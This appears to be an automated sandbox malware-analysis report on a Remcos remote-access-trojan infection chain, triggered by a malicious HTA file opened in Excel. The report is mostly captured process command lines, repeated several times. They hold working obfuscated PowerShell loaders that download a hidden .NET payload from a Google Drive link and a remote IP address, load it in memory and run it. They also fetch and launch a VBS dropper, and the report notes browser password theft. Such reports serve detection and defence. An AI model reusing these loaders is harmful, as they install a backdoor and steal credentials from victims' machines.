= [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 2140JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 2140INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x73bc:$b2: ::FromBase64String(
      • 0x8b05:$b2: ::FromBase64String(
      • 0x621d:$b3: ::UTF8.GetString(
      • 0x7185:$b3: ::UTF8.GetString(
      • 0x890c:$b3: ::UTF8.GetString(
      • 0x296c6:$b3: ::UTF8.GetString(
      • 0x328a3:$b3: ::UTF8.GetString(
      • 0x36b0f:$b3: ::UTF8.GetString(
      • 0x3713f:$b3: ::UTF8.GetString(
      • 0x5bf55:$b3: ::UTF8.GetString(
      • 0x5c72a:$b3: ::UTF8.GetString(
      • 0x71c55:$b3: ::UTF8.GetString(
      • 0x722b8:$b3: ::UTF8.GetString(
      • 0x7336d:$b3: ::UTF8.GetString(
      • 0x7807f:$b3: ::UTF8.GetString(
      • 0x786e1:$b3: ::UTF8.GetString(
      • 0x7a72c:$b3: ::UTF8.GetString(
      • 0x645d:$s1: -join
      • 0x7337:$s1: -join
      • 0x8a8a:$s1: -join
      • 0x1307c:$s1: -join
      Process Memory Space: powershell.exe PID: 3972JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 3972INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x29bc0:$b2: ::FromBase64String(
        • 0x2b32b:$b2: ::FromBase64String(
        • 0x3ca4:$b3: ::UTF8.GetString(
        • 0xcc1c:$b3: ::UTF8.GetString(
        • 0x28a22:$b3: ::UTF8.GetString(
        • 0x29989:$b3: ::UTF8.GetString(
        • 0x2b132:$b3: ::UTF8.GetString(
        • 0x446ac:$b3: ::UTF8.GetString(
        • 0x44c9d:$b3: ::UTF8.GetString(
        • 0x4bde1:$b3: ::UTF8.GetString(
        • 0x4c5b4:$b3: ::UTF8.GetString(
        • 0x551a1:$b3: ::UTF8.GetString(
        • 0x55803:$b3: ::UTF8.GetString(
        • 0x62e7c:$b3: ::UTF8.GetString(
        • 0x634df:$b3: ::UTF8.GetString(
        • 0x64645:$b3: ::UTF8.GetString(
        • 0x3e74:$s1: -join
        • 0xcdec:$s1: -join
        • 0x1ad40:$s1: -join
        • 0x1b666:$s1: -join
        • 0x28c62:$s1: -join
        Process Memory Space: CasPol.exe PID: 3900JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVu
          Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3460, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta
          Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" , ProcessId: 3196, ProcessName: wscript.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhU